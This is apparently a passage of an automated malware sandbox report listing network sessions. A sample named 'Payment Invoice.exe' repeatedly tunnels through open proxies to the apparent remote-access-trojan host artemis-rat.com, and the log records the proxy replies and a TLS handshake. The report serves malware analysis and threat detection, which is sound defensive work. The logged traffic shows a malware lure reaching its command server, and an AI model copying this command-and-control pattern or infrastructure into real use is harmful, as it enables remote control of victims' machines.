                                                                Mar 11, 2024 16:15:20.953196049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1428192.168.2.45440847.89.184.1831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.953671932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.176012993 CET38INHTTP/1.1 200 OK
                                                                content-length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1429192.168.2.454492162.214.225.223507537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.954843998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511467934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1430192.168.2.45431894.23.252.16891807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.956712961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756630898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.786143064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777072906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.538059950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.341499090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.101373911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1431192.168.2.45434646.17.63.16641547076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.956813097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.257951975 CET339INHTTP/1.1 403 Forbidden
                                                                Server: squid/4.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 5
                                                                X-Squid-Error: TCP_RESET 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from proxy.wakoopa.com
                                                                Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                Connection: keep-alive
                                                                Data Raw: 72 65 73 65 74
                                                                Data Ascii: reset


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1432192.168.2.45432234.92.12.21092387076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.961772919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.631644964 CET28INHTTP/1.1 502 Bad Gateway


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1433192.168.2.454275177.38.5.1641537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.967916012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1434192.168.2.453720164.92.86.113633587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.975310087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.049066067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183207035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.276993036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.276696920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1435192.168.2.45433651.210.216.54807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.984122038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.737751961 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:24 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1436192.168.2.453587121.140.63.24931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.987142086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.049007893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183213949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.276979923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1437192.168.2.454341139.224.64.19180817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.990596056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.326014042 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                Mar 11, 2024 16:15:21.326142073 CET716INHTTP/1.1 405 Not Allowed
                                                                Server: nginx/1.18.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 559
                                                                Connection: keep-alive
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.18.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1438192.168.2.454307103.179.253.20281817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.992162943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.890310049 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1439192.168.2.45448067.43.228.253289937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.995343924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1440192.168.2.452421107.173.255.18312347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.000209093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1441192.168.2.45437818.133.16.21807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.002619982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.293608904 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:21.327337980 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ef 20 07 6f 71 8a fd 96 19 2b 7a f2 db 18 8a 7c c7 aa fa a1 0a 28 7e f0 cb 49 53 ba d6 b6 0a 20 65 47 41 8b 6a f1 43 94 2f 7e 2a bf 41 8a 6e 54 6f a5 17 6b 53 f8 a0 99 3b ef a3 0d 42 e1 fd db 00 2a c0 2c c0 2b
                                                                Data Ascii: e oq+z|(~IS eGAjC/~*AnTokS;B*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:21.621512890 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 d9 81 49 20 e1 8a 9f ed 7e d7 7a 75 ac a4 50 4d fd 7e da 7b 79 17 6c b1 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9I ~zuPM~{ylDOWNGRD0000*H010Uartemis-rat.com0240311142236Z260311142236Z010Uartemis-rat.com0"0*H09RK
                                                                Mar 11, 2024 16:15:21.776309967 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 77 6c 6d 28 99 d7 f1 51 01 43 9c 56 a9 75 93 d0 59 4b b3 21 31 e8 1f 20 3c 2b 01 4d 44 1e d3 0e 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 03 29 b5 87 21 e9 53 75 09 11 07 5e 66 e4 13 da dd d5 69 26 8a
                                                                Data Ascii: %! wlm(QCVuYK!1 <+MD()!Su^fi&3
                                                                Mar 11, 2024 16:15:22.066118956 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 1a 72 03 47 19 b0 3e 74 e1 ff 2e f2 89 fe c9 45 af b9 31 41 b8 cc d8 9b 7b 06 f9 7e 3e 53 08 34 dd be 8b 7b e4 11 55 11
                                                                Data Ascii: (rG>t.E1A{~>S4{U


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1442192.168.2.45426927.76.193.21310807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.006150007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1443192.168.2.45451645.12.31.140807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.012304068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480057001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.641208887 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1444192.168.2.45443535.72.118.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.014461040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
